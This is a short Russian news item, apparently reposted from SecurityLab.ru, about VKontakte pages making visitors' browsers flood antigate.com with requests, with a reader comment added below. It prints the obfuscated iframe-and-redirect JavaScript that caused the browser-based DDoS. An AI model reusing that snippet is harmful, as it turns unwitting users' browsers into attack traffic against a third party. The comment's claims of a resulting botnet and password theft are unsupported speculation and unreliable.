Сегодня многие пользователи ВКонтакте, посетившие сайт социальной сети, могли стать невольными участниками DDoS атаки на сайт antigate.com.
На страницах пользователей загружался следующий JavaScript сценарий:
function _test() {
var fr=utilsNode.appendChild(ce('iframe'
,d=fr.contentWindow.document;d.open();d.write(' this.location="http://ant'+'iga'+'te.com/i '+'n.php?'+'firs'+'t_an'+'d_la'+'st_wa'+'rnin'+ 'g=o'+'n";');setTimeout(re.pbind(fr),1000);}
Этот сценарий отправлял запрос на сайт antigate.com из браузера каждого пользователя соцсети «ВКонтакте» при каждой загрузке страницы.
Подобные действия со стороны администрации «ВКонтакте» не могут радовать, и невольно поднимается вопрос о моральности и законности (ст. 274 УК РФ) подобных действий.
Редакция SecurityLab.ru отправила письмо в пресс-службу «ВКонтаке» с просьбой прокомментировать сложившуюся ситуацию, но на момент публикации новости ответ получен не был.
**
Всё бы ерунда, но ... antigate.com решил проблему просто - перенаправив весь трафик на порно ресурс, а порно ресурсы у нас с чем? Правильно - вирусами и троями. И теперь благодаря павлику дибилоиду, кто то получил хороший ботнет и если там стояли граберы паролей то и пароли к самому контакту.
Автор:
Balloo 
/ 6 Ноября 2018 в 13:42 / Просмотров: 746